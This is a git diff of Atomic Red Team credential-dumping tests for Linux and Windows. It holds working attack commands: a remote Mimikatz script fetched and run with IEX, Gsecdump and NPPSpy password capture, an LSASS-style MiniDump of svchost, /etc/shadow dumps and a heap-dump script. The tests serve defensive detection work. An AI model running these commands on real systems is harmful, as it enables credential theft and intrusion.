dependencies:
- description: |
MimiPenguin script must exist on disk at specified location (#{MimiPenguin_Location})
prereq_command: |
if [ -f "#{MimiPenguin_Location}" ]; then exit 0; else exit 1; fi;
get_prereq_command: |
wget -O "/tmp/mimipenguin.tar.gz" https://github.com/huntergregal/mimipenguin/releases/download/2.0-release/mimipenguin_2.0-release.tar.gz
mkdir /tmp/mimipenguin
tar -xzvf "/tmp/mimipenguin.tar.gz" -C /tmp/mimipenguin
- description: |
Strings must be installed
prereq_command: |
if [ -x "$(command -v strings --version)" ]; then exit 0; else exit 1; fi;
get_prereq_command: |
sudo apt-get -y install binutils
- description: |
Python2 must be installed
prereq_command: |
if [ -x "$(command -v python2 --version)" ]; then exit 0; else exit 1; fi;
get_prereq_command: |
sudo apt-get -y install python2
- description: |
Libc-bin must be installed
prereq_command: |
if [ -x "$(command -v ldd --version)" ]; then exit 0; else exit 1; fi;
get_prereq_command: |
sudo apt-get -y install libc-bin
executor:
command: |
sudo #{MimiPenguin_Location} > #{output_file}
cat #{output_file}
cleanup_command: |
rm -f #{output_file} > /dev/null
name: bash
elevation_required: true
atomics/T1003.007/src/dump_heap.py
-31
View File
@@ -1,31 +0,0 @@
#!/usr/bin/env python
'''Dump a process's heap space to disk
Usage:
python dump_proc.py <PID> <filepath>
'''
import argparse
parser = argparse.ArgumentParser(description='Dump a process\'s heap space to disk')
parser.add_argument('pid', type=int, help='ID of process to dump')
parser.add_argument('filepath', help='A filepath to save output to')
args = parser.parse_args()
process_id = args.pid
output_file = args.filepath
with open("/proc/{}/maps".format(process_id), "r") as maps_file:
# example: 5566db1a6000-5566db4f0000 rw-p 00000000 00:00 0 [heap]
heap_line = next(filter(lambda line: "[heap]" in line, maps_file))
heap_range = heap_line.split(' ')[0]
mem_start = int(heap_range.split('-')[0], 16)
mem_stop = int(heap_range.split('-')[1], 16)
mem_size = mem_stop - mem_start
with open("/proc/{}/mem".format(process_id), "rb") as mem_file:
mem_file.seek(mem_start, 0)
heap_mem = mem_file.read(mem_size)
with open(output_file, "wb") as ofile:
ofile.write(heap_mem)
atomics/T1003.008/T1003.008.md
-170
View File
@@ -1,170 +0,0 @@
# T1003.008 - /etc/passwd and /etc/shadow
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/008)
<blockquote>Adversaries may attempt to dump the contents of <code>/etc/passwd</code> and <code>/etc/shadow</code> to enable offline password cracking. Most modern Linux operating systems use a combination of <code>/etc/passwd</code> and <code>/etc/shadow</code> to store user account information including password hashes in <code>/etc/shadow</code>. By default, <code>/etc/shadow</code> is only readable by the root user.(Citation: Linux Password and Shadow File Formats)
The Linux utility, unshadow, can be used to combine the two files in a format suited for password cracking utilities such as John the Ripper:(Citation: nixCraft - John the Ripper) <code># /usr/bin/unshadow /etc/passwd /etc/shadow > /tmp/crack.password.db</code>
</blockquote>
## Atomic Tests
- [Atomic Test #1 - Access /etc/shadow (Local)](#atomic-test-1---access-etcshadow-local)
- [Atomic Test #2 - Access /etc/passwd (Local)](#atomic-test-2---access-etcpasswd-local)
- [Atomic Test #3 - Access /etc/{shadow,passwd} with a standard bin that's not cat](#atomic-test-3---access-etcshadowpasswd-with-a-standard-bin-thats-not-cat)
- [Atomic Test #4 - Access /etc/{shadow,passwd} with shell builtins](#atomic-test-4---access-etcshadowpasswd-with-shell-builtins)
<br/>
## Atomic Test #1 - Access /etc/shadow (Local)
/etc/shadow file is accessed in Linux environments
**Supported Platforms:** Linux
**auto_generated_guid:** 3723ab77-c546-403c-8fb4-bb577033b235
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | Path | /tmp/T1003.008.txt|
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
```bash
sudo cat /etc/shadow > #{output_file}
cat #{output_file}
```
#### Cleanup Commands:
```bash
rm -f #{output_file}
```
<br/>
<br/>
## Atomic Test #2 - Access /etc/passwd (Local)
/etc/passwd file is accessed in Linux environments
**Supported Platforms:** Linux
**auto_generated_guid:** 60e860b6-8ae6-49db-ad07-5e73edd88f5d
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | Path | /tmp/T1003.008.txt|
#### Attack Commands: Run with `sh`!
```sh
cat /etc/passwd > #{output_file}
cat #{output_file}
```
#### Cleanup Commands:
```sh
rm -f #{output_file}
```
<br/>
<br/>
## Atomic Test #3 - Access /etc/{shadow,passwd} with a standard bin that's not cat
Dump /etc/passwd and /etc/shadow using ed
**Supported Platforms:** Linux
**auto_generated_guid:** df1a55ae-019d-4120-bc35-94f4bc5c4b0a
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | Path | /tmp/T1003.008.txt|
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
```bash
echo -e "e /etc/passwd\n,p\ne /etc/shadow\n,p\n" | ed > #{output_file}
```
#### Cleanup Commands:
```bash
rm -f #{output_file}
```
<br/>
<br/>
## Atomic Test #4 - Access /etc/{shadow,passwd} with shell builtins
Dump /etc/passwd and /etc/shadow using bash builtins
**Supported Platforms:** Linux
**auto_generated_guid:** f5aa6543-6cb2-4fae-b9c2-b96e14721713
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | Path | /tmp/T1003.008.txt|
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
```bash
function testcat(){ echo "$(< $1)"; }
testcat /etc/passwd > #{output_file}
testcat /etc/shadow > #{output_file}
```
#### Cleanup Commands:
```bash
rm -f #{output_file}
```
<br/>
atomics/T1003.008/T1003.008.yaml
-78
View File
@@ -1,78 +0,0 @@
attack_technique: T1003.008
display_name: 'OS Credential Dumping: /etc/passwd and /etc/shadow'
atomic_tests:
- name: Access /etc/shadow (Local)
auto_generated_guid: 3723ab77-c546-403c-8fb4-bb577033b235
description: |
/etc/shadow file is accessed in Linux environments
supported_platforms:
- linux
input_arguments:
output_file:
description: Path where captured results will be placed
type: Path
default: /tmp/T1003.008.txt
executor:
command: |
sudo cat /etc/shadow > #{output_file}
cat #{output_file}
cleanup_command: |
rm -f #{output_file}
name: bash
elevation_required: true
- name: Access /etc/passwd (Local)
auto_generated_guid: 60e860b6-8ae6-49db-ad07-5e73edd88f5d
description: |
/etc/passwd file is accessed in Linux environments
supported_platforms:
- linux
input_arguments:
output_file:
description: Path where captured results will be placed
type: Path
default: /tmp/T1003.008.txt
executor:
command: |
cat /etc/passwd > #{output_file}
cat #{output_file}
cleanup_command: |
rm -f #{output_file}
name: sh
- name: Access /etc/{shadow,passwd} with a standard bin that's not cat
auto_generated_guid: df1a55ae-019d-4120-bc35-94f4bc5c4b0a
description: |
Dump /etc/passwd and /etc/shadow using ed
supported_platforms:
- linux
input_arguments:
output_file:
description: Path where captured results will be placed
type: Path
default: /tmp/T1003.008.txt
executor:
command: |
echo -e "e /etc/passwd\n,p\ne /etc/shadow\n,p\n" | ed > #{output_file}
cleanup_command: |
rm -f #{output_file}
name: bash
elevation_required: true
- name: Access /etc/{shadow,passwd} with shell builtins
auto_generated_guid: f5aa6543-6cb2-4fae-b9c2-b96e14721713
description: |
Dump /etc/passwd and /etc/shadow using bash builtins
supported_platforms:
- linux
input_arguments:
output_file:
description: Path where captured results will be placed
type: Path
default: /tmp/T1003.008.txt
executor:
command: |
function testcat(){ echo "$(< $1)"; }
testcat /etc/passwd > #{output_file}
testcat /etc/shadow > #{output_file}
cleanup_command: |
rm -f #{output_file}
name: bash
elevation_required: true
atomics/T1003/T1003.md
+42 -56
View File
@@ -7,16 +7,48 @@ Several of the tools mentioned in associated sub-techniques may be used by both
## Atomic Tests
- [Atomic Test #1 - Gsecdump](#atomic-test-1---gsecdump)
- [Atomic Test #1 - Powershell Mimikatz](#atomic-test-1---powershell-mimikatz)
- [Atomic Test #2 - Credential Dumping with NPPSpy](#atomic-test-2---credential-dumping-with-nppspy)
- [Atomic Test #2 - Gsecdump](#atomic-test-2---gsecdump)
- [Atomic Test #3 - Dump svchost.exe to gather RDP credentials](#atomic-test-3---dump-svchostexe-to-gather-rdp-credentials)
- [Atomic Test #3 - Credential Dumping with NPPSpy](#atomic-test-3---credential-dumping-with-nppspy)
<br/>
## Atomic Test #1 - Gsecdump
## Atomic Test #1 - Powershell Mimikatz
Dumps credentials from memory via Powershell by invoking a remote mimikatz script.
If Mimikatz runs successfully you will see several usernames and hashes output to the screen.
Common failures include seeing an \"access denied\" error which results when Anti-Virus blocks execution.
Or, if you try to run the test without the required administrative privleges you will see this error near the bottom of the output to the screen "ERROR kuhl_m_sekurlsa_acquireLSA"
**Supported Platforms:** Windows
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_script | URL to a remote Mimikatz script that dumps credentials | Url | https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
```
<br/>
<br/>
## Atomic Test #2 - Gsecdump
Dump credentials from memory using Gsecdump.
Upon successful execution, you should see domain\username's following by two 32 characters hashes.
@@ -29,18 +61,14 @@ If you see a message saying "The system cannot find the path specified", try usi
**Supported Platforms:** Windows
**auto_generated_guid:** 96345bfc-8ae7-4b6a-80b7-223200f24ef9
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| gsecdump_exe | Path to the Gsecdump executable | Path | PathToAtomicsFolder&#92;T1003&#92;bin&#92;gsecdump.exe|
| gsecdump_bin_hash | File hash of the Gsecdump binary file | String | 94CAE63DCBABB71C5DD43F55FD09CAEFFDCD7628A02A112FB3CBA36698EF72BC|
| gsecdump_url | Path to download Gsecdump binary file | Url | https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe|
| gsecdump_url | Path to download Gsecdump binary file | url | https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
@@ -57,13 +85,13 @@ If you see a message saying "The system cannot find the path specified", try usi
##### Description: Gsecdump must exist on disk at specified location (#{gsecdump_exe})
##### Check Prereq Commands:
```powershell
if (Test-Path #{gsecdump_exe}) {exit 0} else {exit 1}
if (Test-Path #{gsecdump_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$parentpath = Split-Path "#{gsecdump_exe}"; $binpath = "$parentpath\gsecdump-v2b5.exe"
IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing)
IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1")
if(Invoke-WebRequestVerifyHash "#{gsecdump_url}" "$binpath" #{gsecdump_bin_hash}){
Move-Item $binpath "#{gsecdump_exe}"
}
@@ -75,7 +103,7 @@ if(Invoke-WebRequestVerifyHash "#{gsecdump_url}" "$binpath" #{gsecdump_bin_hash}
<br/>
<br/>
## Atomic Test #2 - Credential Dumping with NPPSpy
## Atomic Test #3 - Credential Dumping with NPPSpy
Changes ProviderOrder Registry Key Parameter and creates Key for NPPSpy.
After user's logging in cleartext password is saved in C:\NPPSpy.txt.
Clean up deletes the files and reverses Registry changes.
@@ -84,10 +112,6 @@ NPPSpy Source: https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NP
**Supported Platforms:** Windows
**auto_generated_guid:** 9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6
@@ -124,52 +148,14 @@ Remove-Item C:\Windows\System32\NPPSpy.dll -ErrorAction Ignore
##### Description: NPPSpy.dll must be available in local temp directory
##### Check Prereq Commands:
```powershell
if (Test-Path "$env:Temp\NPPSPY.dll") {exit 0} else {exit 1}
if (Test-Path "$env:Temp\NPPSPY.dll") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "$env:Temp\NPPSPY.dll"
```
<br/>
<br/>
## Atomic Test #3 - Dump svchost.exe to gather RDP credentials
The svchost.exe contains the RDP plain-text credentials.
Source: https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/
Upon successful execution, you should see the following file created $env:TEMP\svchost-exe.dmp.
**Supported Platforms:** Windows
**auto_generated_guid:** d400090a-d8ca-4be0-982e-c70598a23de9
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
$ps = (Get-NetTCPConnection -LocalPort 3389 -State Established -ErrorAction Ignore)
if($ps){$id = $ps[0].OwningProcess} else {$id = (Get-Process svchost)[0].Id }
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full
```
#### Cleanup Commands:
```powershell
Remove-Item $env:TEMP\svchost-exe.dmp -ErrorAction Ignore
```
<br/>
atomics/T1003/T1003.yaml
+21 -23
View File
@@ -1,6 +1,25 @@
attack_technique: T1003
display_name: OS Credential Dumping
atomic_tests:
- name: Powershell Mimikatz
auto_generated_guid: 66fb0bc1-3c3f-47e9-a298-550ecfefacbc
description: |
Dumps credentials from memory via Powershell by invoking a remote mimikatz script.
If Mimikatz runs successfully you will see several usernames and hashes output to the screen.
Common failures include seeing an \"access denied\" error which results when Anti-Virus blocks execution.
Or, if you try to run the test without the required administrative privleges you will see this error near the bottom of the output to the screen "ERROR kuhl_m_sekurlsa_acquireLSA"
supported_platforms:
- windows
input_arguments:
remote_script:
description: URL to a remote Mimikatz script that dumps credentials
type: Url
default: https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1
executor:
command: |
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
name: powershell
elevation_required: true
- name: Gsecdump
auto_generated_guid: 96345bfc-8ae7-4b6a-80b7-223200f24ef9
@@ -26,7 +45,7 @@ atomic_tests:
default: 94CAE63DCBABB71C5DD43F55FD09CAEFFDCD7628A02A112FB3CBA36698EF72BC
gsecdump_url:
description: Path to download Gsecdump binary file
type: Url
type: url
default: https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe
dependency_executor_name: powershell
dependencies:
@@ -37,7 +56,7 @@ atomic_tests:
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$parentpath = Split-Path "#{gsecdump_exe}"; $binpath = "$parentpath\gsecdump-v2b5.exe"
IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing)
IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1")
if(Invoke-WebRequestVerifyHash "#{gsecdump_url}" "$binpath" #{gsecdump_bin_hash}){
Move-Item $binpath "#{gsecdump_exe}"
}
@@ -61,7 +80,6 @@ atomic_tests:
- description: NPPSpy.dll must be available in local temp directory
prereq_command: if (Test-Path "$env:Temp\NPPSPY.dll") {exit 0} else {exit 1}
get_prereq_command: |-
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "$env:Temp\NPPSPY.dll"
executor:
command: |-
@@ -85,23 +103,3 @@ atomic_tests:
Remove-Item C:\Windows\System32\NPPSpy.dll -ErrorAction Ignore
name: powershell
elevation_required: true
- name: Dump svchost.exe to gather RDP credentials
auto_generated_guid: d400090a-d8ca-4be0-982e-c70598a23de9
description: |
The svchost.exe contains the RDP plain-text credentials.
Source: https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/
Upon successful execution, you should see the following file created $env:TEMP\svchost-exe.dmp.
supported_platforms:
- windows
executor:
command: |
$ps = (Get-NetTCPConnection -LocalPort 3389 -State Established -ErrorAction Ignore)
if($ps){$id = $ps[0].OwningProcess} else {$id = (Get-Process svchost)[0].Id }
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full
cleanup_command: |
Remove-Item $env:TEMP\svchost-exe.dmp -ErrorAction Ignore
name: powershell
elevation_required: true
atomics/T1006/T1006.md
+2 -6
View File
@@ -25,16 +25,12 @@ For a NTFS volume, it should correspond to the following sequence ([NTFS partiti
**Supported Platforms:** Windows
**auto_generated_guid:** 88f6327e-51ec-4bbf-b2e8-3fea534eab8b
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| volume | Drive letter of the volume to access | String | C:|
| volume | Drive letter of the volume to access | string | C:|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)

Some files were not shown because too many files have changed in this diff Show More